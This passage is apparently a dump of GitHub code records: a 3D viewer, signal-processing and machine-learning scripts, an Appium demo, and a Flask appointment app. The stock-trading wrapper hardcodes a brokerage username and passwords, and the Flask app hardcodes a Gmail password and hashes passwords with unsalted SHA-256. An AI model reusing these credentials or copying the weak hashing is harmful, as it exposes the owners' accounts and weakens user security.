v2[1],\n\t\t\t\t\t -v1[0] * v2[2] + v1[2] * v2[0],\n\t\t\t\t\t v1[0] * v2[1] - v1[1] * v2[0]]\n\t\t\tcamera = [0, 0, 1]\n\t\t\tdot = cross[0] * camera[0] + cross[1] * camera[1] + cross[2] * camera[2]\n\t\t\tcross_length = sqrt(cross[0] ** 2 + cross[1] ** 2 + cross[2] ** 2)\n\t\t\tangle = acos(dot / cross_length)\n\t\t\tif angle > pi / 2:\n\t\t\t\ttris.append(tri + [self.colors[i]])\n\t\t\ti += 1\n\n\n\t\tfor tri in tris:\n\t\t\tp1x = int(self.points[tri[0]][0]) + center[0]\n\t\t\tp1y = -int(self.points[tri[0]][1]) + center[1]\n\t\t\tp2x = int(self.points[tri[1]][0]) + center[0]\n\t\t\tp2y = -int(self.points[tri[1]][1]) + center[1]\n\t\t\tp3x = int(self.points[tri[2]][0]) + center[0]\n\t\t\tp3y = -int(self.points[tri[2]][1]) + center[1]\n\t\t\tpygame.draw.polygon(screen, tri[3], ((p1x, p1y), (p2x, p2y), (p3x, p3y)))\n\nclass Cube(Model):\n\t\"\"\" A cube model \"\"\"\n\t\n\tdef __init__(self, size):\n\t\t\"\"\" Create new cube model where the length of each edge is size \"\"\"\n\t\tpoints = [[-size / 2, -size / 2, -size / 2], [-size / 2, size / 2, -size / 2],\n\t\t\t\t[size / 2, size / 2, -size / 2], [size / 2, -size / 2, -size / 2],\n\t\t\t\t[-size / 2, -size / 2, size / 2], [-size / 2, size / 2, size / 2],\n\t\t\t \t[size / 2, size / 2, size / 2], [size / 2, -size / 2, size / 2]]\n\n\t\tmesh = [[3, 0, 1], [1, 2, 3], [3, 2, 7], [6, 7,2],\n\t\t\t\t[4, 7, 6], [6, 5, 4], [5, 1, 0], [0, 4, 5],\n\t\t\t\t[2, 1, 5], [5, 6, 2], [0, 3, 7], [7, 4, 0]]\n\n\t\tcolors = [(255, 0, 0), (235, 0, 0), (0, 255, 0), (0, 235, 0),\n\t\t\t\t(0, 0, 255), (0, 0, 235), (200, 0, 200), (185, 0, 185),\n\t\t\t\t(255, 255, 0), (235, 235, 0), (0, 235, 235), (0, 200, 200)]\n\n\t\tsuper().__init__(points, mesh, colors)\n\n\nclass TriangularPrism(Model):\n\t\"\"\" A triangular prism model \"\"\"\n\t\n\tdef __init__(self, tri_size, length):\n\t\t\"\"\" Create a new model where tri_size is the length of the triangle edges \n\t\t\t\tand length is the depth of the prism \"\"\"\n\t\theight = sqrt(tri_size ** 2 - (tri_size / 2) ** 2)\n\t\tpoints = [[-tri_size / 2, -height / 2, -length / 2],\n\t\t\t\t [0, height / 2, -length / 2],\n\t\t\t\t [tri_size / 2, -height / 2, -length / 2],\n\t\t\t\t [-tri_size / 2, -height / 2, length / 2],\n\t\t \t\t [0, height / 2, length / 2],\n\t\t \t\t [tri_size / 2, -height / 2, length / 2]]\n\t\tmesh = [[0, 1, 2], [3, 1, 0], [3, 4, 1], [2, 1, 4], [4, 5, 2],\n\t\t\t\t[0, 2, 5], [5, 3, 0], [5, 4, 3]]\n\t\tcolors = [(255, 255, 0), (255, 0, 0), (235, 0, 0), (0, 255, 0),\n\t\t\t\t (0, 235, 0), (0, 0, 255), (0, 0, 235), (200, 0, 200)]\n\n\t\tsuper().__init__(points, mesh, colors)\n\n\nclass Pyramid(Model):\n\t\"\"\" A pyramid model \"\"\"\n\t\n\tdef __init__(self, size):\n\t\t\"\"\" Create a new model where size is the length of each edge \"\"\"\n\t\theight = sqrt(size ** 2 - (size / 2) ** 2)\n\t\tpoints = [[-size / 2, -height / 2, -size / 2],\n\t\t\t\t [-size / 2, -height / 2, size / 2],\n\t\t\t\t [size / 2, -height / 2, size / 2],\n\t\t\t\t [size / 2, -height / 2, -size / 2],\n\t\t\t\t [0, height / 2, 0]]\n\t\tmesh = [[0, 4, 3], [1, 4, 0], [2, 4, 1], [3, 4, 2], [1, 0, 3], [3, 2, 1]]\n\t\tcolors = [(255, 0, 0), (0, 255, 0), (0, 0, 255), (255, 255, 0), (200, 0, 200), (185, 0, 185)]\n\n\t\tsuper().__init__(points, mesh, colors)\n\n\nif __name__ == \"__main__\":\n\tModelViewer()\n","repo_name":"JoeZlonicky/3DModelViewer","sub_path":"model_viewer.py","file_name":"model_viewer.py","file_ext":"py","file_size_in_byte":7692,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"31982906731","text":"\n# coding: utf-8\n\n# In[4]:\n\n\nimport data\n\n\n# In[9]:\n\n\ndef character_frequency(lyrics, vocab_size=3000):\n \"\"\"Analyze Characters frequence.\n \n In a list of list of sentences.\n Example: [[\"song1\", \"hello world\", \"end\"], [\"song2\", \"happy end\"]]\n \"\"\"\n import matplotlib.pyplot as plt\n import numpy as np\n import itertools\n from collections import Counter\n\n get_ipython().magic('matplotlib inline')\n iter_characters = itertools.chain(*itertools.chain(*lyrics))\n frequency_list = Counter(iter_characters).most_common()\n word, freq = zip(*frequency_list)\n \n plt.ylabel('frequency(log)')\n plt.xlabel('rank')\n plt.plot(range(len(frequency_list)), np.log(freq))\n plt.show()\n print('100 Most frequent word: {0}'.format(word[:100]))\n return word[:vocab_size], freq[:vocab_size]\n\n\n# In[10]:\n\n\nif __name__ == '__main__':\n lyrics = data.lyrics_without_timing()\n character_frequency(lyrics)\n\n","repo_name":"qibinc/Lyrics","sub_path":"archived/preprocess/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"47"} +{"seq_id":"26025369252","text":"import sys\r\nsys.path.append(r'D:/MyProjects/python/stockcrawl/下载数据/SellBuy')\r\nimport os\r\nsys.path.append(os.getcwd())\r\nimport easytrader\r\nimport threading\r\nfrom PriceLoop import logger\r\n\r\n\r\n\r\n\r\n\r\niniPosiData=[{'证券代码':'','证券名称':'','股票余额':0,'可用余额':0,'冻结数量':0,'成本价':0,'保本价':0,'市价':0,'盈亏比':0,'盈亏':0,'市值':0,'交易市场':'','股东帐户':'','在途数量':0}]\r\n\r\n\r\nclass Account_easytrader():\r\n\t_Account_easytrader_lock = threading.Lock()\r\n\tdef __new__(cls, *args, **kwargs):#实现单例\r\n\t\tif not hasattr(Account_easytrader, \"_instance\"):\r\n\t\t\twith Account_easytrader._Account_easytrader_lock:\r\n\t\t\t\tif not hasattr(Account_easytrader, \"_instance\"):\r\n\t\t\t\t\tcls.InitFlag = False\r\n\t\t\t\t\tAccount_easytrader._instance = threading.Thread.__new__(cls) \r\n\t\treturn Account_easytrader._instance\r\n\tdef __init__(self):\r\n\t\tif not self.InitFlag:\r\n\t\t\tself.InitFlag = True\r\n\t\t\tself.userMutex = threading.Lock()\r\n\t\t\tself.userAccount = 0\r\n\t\t\tself.__UserInition()\r\n\t\t\tself.PosiData = iniPosiData\r\n\t\t\tself.TodayTrades = 0\r\n\t\t\tself.balanceData = 0\r\n\tdef __UserInition(self):\r\n\t\tif self.userMutex.acquire(1):\r\n\t\t\tif (self.userAccount == 0):\r\n\t\t\t\tprint('初始化并登录账号.账号类型:华泰客户端')\r\n\t\t\t\ttry:\r\n\t\t\t\t\tself.userAccount = easytrader.use('ht_client')#华泰客户端\r\n\t\t\t\t\tself.userAccount.prepare(user='666600641060', password='457204', comm_password='241155',exe_path='D:/Program Files/htzqzyb2/xiadan.exe')\r\n\t\t\t\t\tprint('账号登录完成.可进入监控程序。')\r\n\t\t\t\tfinally:\r\n\t\t\t\t\tself.userMutex.release()\r\n\t\t\telse:\r\n\t\t\t\tprint('账号已经初始化。可进入监控程序。')\r\n\t\t\t\tself.userMutex.release()\r\n\tdef GetBalanceData(self):#资金情况\r\n\t\tif self.userMutex.acquire(3):\r\n\t\t\tself.balanceData = self.userAccount.balance\r\n\t\t\tself.userMutex.release()\r\n\tdef GetPosiData(self):#持仓情况\r\n\t\tif self.userMutex.acquire(3):\r\n\t\t\ttry:\r\n\t\t\t\tself.PosiData = self.userAccount.position\r\n\t\t\texcept:\r\n\t\t\t\tself.userMutex.release()\r\n\t\t\telse:\r\n\t\t\t\tself.userMutex.release()\r\n\tdef GetTodayTrades(self):#今日委托\r\n\t\tif self.userMutex.acquire(3):\r\n\t\t\tself.TodayTrades = self.userAccount.today_trades\r\n\t\t\tself.userMutex.release()\r\n\tdef GetAvailable(self):\r\n\t\treturn self.balanceData['可用金额']\r\n\tdef GetTotalAssets(self):\r\n\t\treturn self.balanceData['总资产']\r\n\tdef GetCapitalBalance(self):\r\n\t\treturn self.balanceData['资金余额']\r\n\tdef GettMarketValue(self):\r\n\t\treturn self.balanceData['股票市值']\r\n\tdef GettFreezingFunds(self):\r\n\t\treturn self.balanceData['冻结资金']\r\n\tdef GetHoldingProportion(self):#持仓比例\r\n\t\treturn self.balanceData['股票市值'] / self.balanceData['总资产']\r\n\tdef GetOTWProportion(self):#买入冻结比例\r\n\t\tBuyingFreeze = 0\r\n\t\tfor oneStock in self.PosiData:\r\n\t\t\tBuyingFreeze = oneStock['在途数量'] * oneStock['市价'] + BuyingFreeze\r\n\t\treturn BuyingFreeze / self.balanceData['总资产']\r\n\tdef GetFreezeProportion(self):#卖出冻结比例\r\n\t\tSellFreeze = 0\r\n\t\tfor oneStock in self.PosiData:\r\n\t\t\tSellFreeze = oneStock['冻结数量'] * oneStock['市价'] + SellFreeze\r\n\t\treturn SellFreeze / self.balanceData['总资产']\r\n\r\n\r\n\r\n","repo_name":"136397089/PyProject","sub_path":"stockcrawl/下载数据/SellBuy/Account_easytrader.py","file_name":"Account_easytrader.py","file_ext":"py","file_size_in_byte":3165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"40389608794","text":"# -*- coding: utf-8 -*-\nimport socket\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ns.connect(('104.143.38.56', 8124))\n# s.connect(('127.0.0.1', 9999))\n\nprint(s.recv(1024).decode('utf-8'))\ndata = raw_input()\nwhile data != 'exit':\n s.send(data)\n print(s.recv(1024).decode('utf-8'))\n data = raw_input()\ns.send(b'exit')\ns.close()\n","repo_name":"s09g/NYIT-Senior-Project","sub_path":"server/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"29861438291","text":"from turtle import Turtle\nimport random\nCOLORS = [\"red\", \"orange\", \"yellow\", \"green\", \"blue\", \"purple\"]\nSTARTING_MOVE_DISTANCE = 5\nMOVE_INCREMENT = 10\n\n\nclass CarManager(Turtle):\n\n def __init__(self):\n super().__init__()\n # self.cars = []\n self.move_distance = STARTING_MOVE_DISTANCE\n self.create_a_car()\n\n\n def create_a_car(self):\n self.shape(\"square\")\n self.color(random.choice(COLORS))\n self.shapesize(stretch_wid=1, stretch_len=2)\n self.penup()\n init_x = random.randint(100, 300)\n init_y = random.randint(-240, 240)\n self.goto(init_x, init_y)\n\n def car_move(self, win_times):\n new_x = self.xcor() - STARTING_MOVE_DISTANCE - win_times * MOVE_INCREMENT * 0.2\n self.goto(new_x, self.ycor())\n\n\n","repo_name":"TruthS1109/turtle-crossing","sub_path":"car_manager.py","file_name":"car_manager.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"35025568482","text":"'''author: Shu YuTou Date:2021/5/8'''\nfrom appium import webdriver\n#打开酷狗音乐\n# webdriver.Remote('appium服务器地址',手机配置相关信息)\n'''配置手机相关信息'''\ncaseInfo={\n\t\"platformName\":\"Android\", #测试平台 Android、ios 大小写都可以\n\t\"platformVersion\":\"7.1.2\", #平台版本:设置 关于平板电脑 Android版本\n\t\"deviceName\":\"1\", #设备名称 随便填写,但不能为空\n\t\"appPackage\":\"com.kugou.android\", #包名,即需要测试的软件名称\n\t\"appActivity\":\".app.splash.SplashActivity\",#应用名,界面名 先启动APP,再在cmd中输入‘adb shell dumpsys window | findstr mCurrentFocus’命令获取\n\t\"noReset\":True\n}\n\ndriver = webdriver.Remote('http://localhost:4723/wd/hub',caseInfo)\n","repo_name":"yushuyang2209/AppAutoTest","sub_path":"demo1.py","file_name":"demo1.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"70473857102","text":"import sys\nimport os\nimport redis\nimport re\nimport time\nimport util2 as util\n\n\ndef urlData():\n r = redis.StrictRedis(host=util.localenv(\"REDIS_STATUS_TEST_HOST\"), port=int(util.localenv(\"REDIS_STATUS_TEST_PORT\")))\n day = time.strftime(\"%Y%m%d\")\n yday = time.strftime(\"%Y%m%d\", time.localtime(time.time() - 86400))\n hivedir = os.path.join(util.localenv(\"DATA_DIR\"), \"hive/card_weibo_url_hits_%s\" % day)\n hivefile = os.path.join(hivedir, os.listdir(hivedir)[0])\n regex_url = re.compile('([^\\s]+)\\s+(\\d+)\\s+(\\d+)')\n fp = open(hivefile, \"r\")\n data = {}\n while True:\n line = fp.readline()\n if not line:\n break\n url, second, count = re.match(regex_url, line).groups()\n key = \"%s_card.weibo.com_%s\" % (yday, url)\n if not data.has_key(key):\n data[key] = []\n data[key].append([second, count])\n\n for k, v in data.iteritems():\n r.set(k, v)\n\n fp.close()\n\n\nif __name__ == \"__main__\":\n urlData()\n","repo_name":"bagel/cluster","sub_path":"app/status/urldata.py","file_name":"urldata.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"35265702095","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.signal as signal\nimport sys\nimport codecs\nfrom pylab import *\nfrom spectrum import *\n#import corren #only used for Correntropy Processing (experimental)\n\n#===================================================================\n\ndef findmax(xaxix,vmax):\n\tn = len(xaxix)\n\tfor search in range(0,n):\n\t\tif (xaxix[search] >= vmax):\n\t\t\tfound = search\n\t\t\treturn found\n\t\t\tbreak\n\n\ndef AR_Spectrum(dataAR,norder,fsamp):\n\tAR,P,k = aryule(dataAR,norder)\n\tPSD = arma2psd(AR,NFFT=len(dataAR))\n\tPSD = PSD[len(PSD):len(PSD)//2:-1]\n\tf = fsamp*(linspace(0,1,len(PSD)))\n\tPSDout = abs(PSD)*2./(2.*pi)\n\treturn f,PSDout\n\ndef singleread(dataread,detype):\n\tif (detype==1):\n\t\tdata = np.genfromtxt(dataread,delimiter=\"\\t\")\n\telif (detype==2):\n\t\tdata = np.genfromtxt(dataread,delimiter=\" \")\n\telse:\n\t\tdata = np.genfromtxt(dataread,delimiter=\",\")\n\tn = len(data)\n\tt = np.linspace(0,(1/fsamp)*len(data),len(data))\n\tprint(\"Data Found, Please wait...\")\n\tprint(\"Length Data = %d Samples/data\" %n)\n\n\treturn data,t\n\ndef tgamread(dataread,eegdata):\n\ttry:\n\t\tdata = codecs.open(dataread,\"r\",\"utf-8\",errors=\"ignore\")\n\t\tprint(\"Data Found, Please wait...\")\n\t\tch1=[]\n\t\tch2=[]\n\t\tidx = 0\n\t\tdelta = []\n\t\ttheta = []\n\t\talpha = []\n\t\tbeta = []\n\t\tgamma = []\n\n\t\tfor line in data:\n\t\t\tread = line.split(\",\")\n\t\t\t#print(read)\n\t\t\tTP = 0\n\t\t\tif (read[0]==\"\\r\\n\") or (len(read)==1) or (read[0]==\" \"):\n\t\t\t\ttemp = read\n\t\t\telif (len(read)>2):\n\t\t\t\tfor j in range(3,11):\n\t\t\t\t TP += int(read[j-1])\n\t\t\t\tTP_add = read[10].splitlines()\n\t\t\t\tTP += int(TP_add[0])\n\t\t\t\tdelta.append(int(read[3])/(TP*1.0))\n\t\t\t\ttheta.append(int(read[4])/(TP*1.0))\n\t\t\t\talpha.append(int(read[5])/(TP*1.0)+int(read[6])/(TP*1.0))\n\t\t\t\tbeta.append(int(read[7])/(TP*1.0)+int(read[8])/(TP*1.0))\n\t\t\t\tgamma.append(int(read[9])/(TP*1.0)+int(TP_add[0])/(TP*1.0))\n\t\t\t #print(TP)\n\t\t\telse:\n\t\t\t\tbaca = read[1].splitlines()\n\t\t\t\t#print(baca)\n\t\t\t\tch1.append(int(read[0]))\n\t\t\t\tch2.append(int(baca[0]))\n\t\t\t\t#print(int(read[0]),int(baca[0]))\n\t\t\t#print(idx)\n\t\t\tidx += 1\n\t\tprint(\"Data Length : \" + str(idx) + \" Samples/data\")\n\t\tdata.close()\n\n\t\t# ch1 Rectified (EMG) ch2 (Raw/ECG/EGG)\n\t\tch1 = np.asarray(ch1)\n\t\tch2 = np.asarray(ch2)\n\t\tt1 = np.linspace(0,(1/500)*len(ch1),len(ch1))\n\t\tt2 = np.linspace(0,(1/500)*len(ch2),len(ch2))\n\n\t\tttt = signal.firwin(200,20,width=None,window=\"hamming\",pass_zero=\"lowpass\",fs=500)\n\t\tchraw = signal.filtfilt(ttt,1,ch2)\n\n\t\t# EEG data\n\t\tdelta = np.asarray(delta)\n\t\ttheta = np.asarray(theta)\n\t\talpha = np.asarray(alpha)\n\t\tbeta = np.asarray(beta)\n\t\tgamma = np.asarray(gamma)\n\n\t\tif (eegdata == 1):\n\t\t\tprintf(\"++ EEG data extracted\")\n\t\t\treturn ch1,ch2,delta,theta,alpha,beta,gamma\n\t\telse:\n\t\t\treturn ch1,chraw,t1\n\texcept IOError:\n\t\tprint(\"SORRY, File not Existed, Please Re-Check\")\n\ndef preprocessing(datainp,fsamp,fdown):\n\tf1 = 0.015\n\tf2 = 0.15\n\tnumtap = 50\n\n\t#detrend\n\tdatainp = signal.detrend(datainp)\n\n\t#h = signal.firwin(numtap,[f1,f2],width=None, window=\"hamming\",pass_zero=\"bandpass\",scale=False,fs=fsamp)\n\tb,a = signal.butter(6,f2,btype=\"lowpass\",analog=False,output=\"ba\",fs=fsamp)\n\tw,h = signal.freqz(b,a,fs=fsamp)\n\tplt.figure(5)\n\tplt.plot(w,abs(h))\n\t#ch_clean = signal.filtfilt(h,1,datainp)\n\tch_clean = signal.filtfilt(b,a,datainp)\n\tt_clean = np.linspace(0,(1/fsamp)*len(ch_clean),len(ch_clean))\n\n\t#ch_decimate = signal.decimate(ch_clean,round(fsamp/fdown),n=None,ftype=\"fir\",zero_phase=False)\n\tch_decimate = downsampling(ch_clean,fsamp,fdown)\n\t\n\treturn ch_decimate,ch_clean\n\t\ndef preprocessing2(datainp,fsamp,fdown):\n\tf1 = 0.015\n\tf2 = 0.15\n\n\t#detrend data (must and compulsory)\n\tdatainpp = signal.detrend(datainp)\n\t\n\tch_decimate = downsampling(datainpp,fsamp,fdown)\n\n\tb,a = signal.butter(6,[f1,f2],btype=\"bandpass\",analog=False,output=\"ba\",fs=fdown)\n\tw,h = signal.freqz(b,a,fs=fdown)\n\tplt.figure(5)\n\tplt.plot(w,abs(h))\n\tch_clean = signal.filtfilt(b,a,ch_decimate)\n\tt_clean = np.linspace(0,(1/fsamp)*len(ch_clean),len(ch_clean))\n\n\t#ch_decimate = signal.decimate(ch_clean,round(fsamp/fdown),n=None,ftype=\"fir\",zero_phase=False) # based on package tool, using downsampling for scratch\n\t\n\treturn ch_clean,ch_decimate\n\ndef downsampling(origin,forigin,flast):\n\tfactor = round(forigin/flast)\n\tndata = len(origin)\n\tcek = 0\n\tdowndata = []\n\twhile (cek < ndata):\n\t\tdowndata.append(origin[cek])\n\t\tcek += factor\n\treturn downdata\n\ndef freqanalysis(chaninp,fsamp):\n\tyfft = np.fft.fft(chaninp,n=len(chaninp))\n\tyabs = abs(yfft)\n\tf = np.linspace(0,fsamp,round(len(yabs)/2))\n\thalf_F = round(len(chaninp)/2)\n\n\treturn f[0:half_F],yabs[0:half_F]\n\nif __name__ == \"__main__\":\n\tfsamp = 200\n\tfdown = 2\n\ttsegmen = 20 # minute\n\t\n\t#for extracting the EEG data from INSINAS device\n\t#ch1,ch2,t = tgamread(sys.argv[1],eegdata=0)\n\t\n\tchread,t = singleread(sys.argv[1],0)\n\t\n\tch2 = chread[:,1]\n\t\n\t#nsegmen = fsamp*tsegmen*60\n\tnsegmen = len(ch2)\n\t\n\tnepoch = round(len(ch2)/nsegmen)\n\tprint(\"Data segment found : %d\" %(nepoch))\n\tcolorchange = 0\n\t\n\tfor seg in range(0,nepoch):\n\t\tstart_seg = seg*nsegmen\n\t\tstop_seg = (seg+1)*nsegmen\n\n\t\t#print(len(ch2[start_seg:stop_seg]))\n\t\t#ch2 = corren.mean_correntropy(ch2[start_seg:stop_seg])\n\n\t\tch_fix,ch = preprocessing2(ch2[start_seg:stop_seg],fsamp,fdown)\n\t\tf,y = freqanalysis(ch_fix,fdown)\n\n\t\tplt.figure(seg)\n\t\tplt.subplot(411)\n\t\tplt.plot(t,ch2)\n\t\tplt.xlim([0,30])\n\t\t#plt.ylim([480,530])\n\t\tplt.subplot(412)\n\t\tplt.plot(ch)\n\t\t#plt.ylim([-0.2,0.2])\n\t\tplt.subplot(413)\n\t\ttfix = np.linspace(0,(1/fdown)*len(ch_fix),len(ch_fix))\n\t\tplt.plot(ch_fix)\n\t\t#plt.ylim([-0.2,0.2])\n\t\tplt.subplot(414)\n\t\tplt.plot(f,y)\n\t\t#plt.xlim([0,0.2])\n\t\t#plt.ylim([0,2])\n\n\t\tfar,psdar = AR_Spectrum(ch_fix,round(0.2*(len(ch_fix)-1)),fdown)\n\n\t\tTPpsdar = np.sum(psdar)\n\t\tpsdar = psdar/TPpsdar\n\n\t\tTPy = np.sum (y)\n\t\ty = y/TPy\n\t\t\n\n\t\t#for plot set\n\t\tmaxy1 = max(y)\n\t\tmaxy2 = max(psdar)\n\t\t\n\t\t\n\t\tmaxfind = findmax(far,0.1)\n\t\tfmax = np.argmax(psdar[:maxfind])\n\t\tprint(\"Freq Max : %.4f with value is : %.4f\" %(far[fmax],psdar[fmax]))\n\n\t\tplt.figure(1)\n\t\t\n\t\tplt.subplot(211)\n\t\t\n\t\t\n\t\tplt.plot(f,y)\n\t\tplt.fill_between(f,y,color=\"k\")\n\t\tplt.ylim([0,0.1])\n\t\tplt.xlim([0,0.3])\n\t\tplt.subplot(212)\n\t\tplt.plot(far,psdar)\t\t\n\t\tplt.fill_between(far,psdar,color=\"k\")\n\t\tplt.ylim([0,0.1])\n\t\tplt.xlim([0,0.3])\n\t\t\n\t\tcolorchange += 100\n\t\t\n\t\t#calculate the stomach PSD at interval frequency\n\t\tlow_freq = findmax(far,0.03)\n\t\thigh_freq = findmax(far,0.07)\n\t\tPSD = np.sum(psdar[low_freq:high_freq])\n\t\tprint(\"PSD on stomach = %.4f\" %PSD)\n\t\t\nplt.show()\n","repo_name":"Alvin2805/BiomedicalPython","sub_path":"EGG Analysis/bacatgam.py","file_name":"bacatgam.py","file_ext":"py","file_size_in_byte":6374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"23749104628","text":"from torch import nn\n\n\nclass ClassificationNetwork(nn.Module):\n def __init__(self, vocab_size, embed_dim, num_nodes, num_class):\n super(ClassificationNetwork, self).__init__()\n\n # self.glove_embedding = nn.EmbeddingBag.from_pretrained(\n # embedding_matrix, freeze=True\n # )\n self.embedding = nn.EmbeddingBag(vocab_size, embed_dim)\n self.dense_block = nn.Sequential(\n nn.Linear(embed_dim, num_nodes),\n nn.ReLU(),\n nn.Dropout(0.5),\n nn.Linear(num_nodes, num_class),\n )\n\n self.embedding.apply(self.init_weights)\n self.dense_block.apply(self.init_weights)\n\n def init_weights(self, layer):\n initrange = 0.5\n\n if isinstance(layer, nn.Linear or nn.EmbeddingBag):\n layer.weight.data.uniform_(-initrange, initrange)\n layer.bias.data.zero_()\n\n def forward(self, text, offsets):\n # combined_embedding = torch.cat(\n # [self.embedding(text, offsets), self.glove_embedding(text, offsets)],\n # dim=-1,\n # )\n embedded = self.embedding(text, offsets)\n return self.dense_block(embedded)\n\n\nclass RuleNetwork(nn.Module):\n def __init__(self, vocab_size, embed_dim, num_nodes, num_class):\n super(RuleNetwork, self).__init__()\n\n self.embedding = nn.EmbeddingBag(vocab_size, embed_dim, sparse=False)\n self.MLP = nn.Sequential(\n nn.Linear(embed_dim, num_nodes[0]),\n nn.LayerNorm(num_nodes[0]),\n nn.ReLU(),\n # nn.Dropout(),\n nn.Linear(num_nodes[0], num_nodes[1]),\n nn.LayerNorm(num_nodes[1]),\n nn.ReLU(),\n # nn.Dropout(),\n nn.Linear(num_nodes[1], num_class),\n )\n\n self.embedding.apply(self.init_weights)\n self.MLP.apply(self.init_weights)\n\n def init_weights(self, layer):\n initrange = 0.5\n\n if isinstance(layer, nn.Linear or nn.EmbeddingBag):\n layer.weight.data.uniform_(-initrange, initrange)\n layer.bias.data.zero_()\n\n def forward(self, text, offsets):\n embedded = self.embedding(text, offsets)\n return self.MLP(embedded)\n","repo_name":"IndominousRex/dep_project_RB","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"5724616990","text":"import psycopg2\nfrom psycopg2.extensions import AsIs\nimport urllib.parse as up\n\nfrom flask_mail import Mail, Message\n\nfrom flask import Flask,request\nfrom flask import jsonify\nfrom flask_cors import CORS\n\nimport os\nfrom os.path import join\nfrom dotenv import load_dotenv\n\nimport hashlib\n\ndotenv_path = join(os.path.dirname(os.path.realpath(__file__)), '.env')\nload_dotenv(dotenv_path)\n\nDATABASE_URL = os.environ.get(\"DATABASE_URL\")\nup.uses_netloc.append(\"postgres\")\nurl = up.urlparse(DATABASE_URL)\ndbconn = psycopg2.connect(\n database=url.path[1:],\n user=url.username,\n password=url.password,\n host=url.hostname,\n port=url.port\n)\napp= Flask(__name__)\ncors = CORS(app)\napp.config['CORS_HEADERS'] = 'Content-Type'\n\n\napp.config.from_mapping(\n DATABASE= \"NITC-ApptMgmt\"\n)\n\n#########################################################################################################################\n\n\"\"\" cursor = dbconn.cursor()\ncursor.execute(\"SELECT * from Appointments\")\nprint(cursor.fetchall())\ndbconn.commit() \"\"\"\n\nmail = Mail(app)\napp.config['MAIL_SERVER'] = 'smtp.gmail.com'\napp.config['MAIL_PORT'] = 465\napp.config['MAIL_USERNAME'] = 'nitc.email.bot@gmail.com'\napp.config['MAIL_PASSWORD'] = 'EMBySGxAcR9xsgV'\napp.config['MAIL_USE_TLS'] = False\napp.config['MAIL_USE_SSL'] = True\nmail = Mail(app)\n\n\n@app.route(\"/\")\ndef index():\n msg = Message('Hello from flask', sender = 'nitc.email.bot@gmail.com', recipients = ['naveen_b190707cs@nitc.ac.in'])\n msg.body = \"Hello Flask message sent from Flask-Mail\"\n mail.send(msg)\n response = jsonify(message=\"The server is running and mail is send\")\n return response\n\n#########################################################################################################################\n#Signs-in the users (admin,faculty,student)\n@app.route(\"/signin\",methods=[\"POST\"])\ndef signinpage():\n cursor = dbconn.cursor()\n \"\"\" {\n \"u_id\":\"B190SDtestCS\",\n \"pwd\":\"SDtestPass\",\n \"type\":\"student\"\n } \"\"\"\n uids= request.json['u_id']\n password= request.json['pwd']\n typess= request.json['type']\n\n #password encryption:\n password=hashlib.sha256(password.encode('utf-8')).hexdigest() #hashvalue\n\n cursor.execute(\"SELECT pwd from Users where u_id=%s\",(uids,))\n x=cursor.fetchone()\n if x is None:\n return jsonify(message=\"Complete the registration\")\n\n temp= x[0]\n dbconn.commit()\n\n\n if temp:\n passcode=temp\n if passcode==password:\n if typess=='student':\n cursor = dbconn.cursor()\n cursor.execute(\"SELECT deptid from Student where roll_no=%s\",(uids,))\n deptids= cursor.fetchone()[0]\n dbconn.commit()\n\n cursor = dbconn.cursor()\n cursor.execute(\"SELECT dname from Departments where department_id=%s\",(deptids,))\n depts= cursor.fetchone()[0]\n dbconn.commit()\n\n cursor = dbconn.cursor()\n cursor.execute(\"SELECT * from Users where u_id=%s\",(uids,))\n dbconn.commit()\n tempone= cursor.fetchone()\n uids,names,emails,password,mobilenos=tempone\n\n return jsonify({\"u_id\":uids,\"uname\":names,\"email\":emails,\"pwd\":password,\"mobileno\":mobilenos,\"deptid\":deptids,\"dname\":depts})\n\n elif typess=='faculty':\n cursor = dbconn.cursor()\n cursor.execute(\"SELECT deptid from Faculty where ssn=%s\",(uids,))\n deptids= cursor.fetchone()[0]\n dbconn.commit()\n\n cursor = dbconn.cursor()\n cursor.execute(\"SELECT dname from Departments where department_id=%s\",(deptids,))\n depts= cursor.fetchone()[0]\n dbconn.commit()\n\n cursor = dbconn.cursor()\n cursor.execute(\"SELECT * from Users where u_id=%s\",(uids,))\n dbconn.commit()\n tempone= cursor.fetchone()\n uids,names,emails,password,mobilenos=tempone\n\n return jsonify({\"u_id\":uids,\"uname\":names,\"email\":emails,\"pwd\":password,\"mobileno\":mobilenos,\"deptid\":deptids,\"dname\":depts})\n\n elif typess=='admin':\n cursor = dbconn.cursor()\n cursor.execute(\"SELECT * from Users where u_id=%s\",(uids,))\n dbconn.commit()\n tempone= cursor.fetchone()\n uids,names,emails,password,mobilenos=tempone\n\n return jsonify({\"u_id\":uids,\"uname\":names,\"email\":emails,\"pwd\":password,\"mobileno\":mobilenos})\n else:\n return jsonify(message=\"Incorrect Password\")\n\n#########################################################################################################################\n\n#Admin signs-up the users(faculty, student) into the DB.\n@app.route(\"/signup\",methods=[\"POST\"])\n#@app.route(\"/signup\")\ndef registration():\n\n cursor = dbconn.cursor()\n uids= request.json['u_id']\n names= request.json['uname'] #name\n emails= request.json['email']\n password= request.json['pwd']\n mobilenos= request.json['mobileno']\n depts= request.json['dname']\n typess= request.json['type']\n\n #uids= '1234567'\n #names= 'SDtestName'\n #emails= 'SDtestName@gmail.com'\n #password= 'SDtestPass'\n 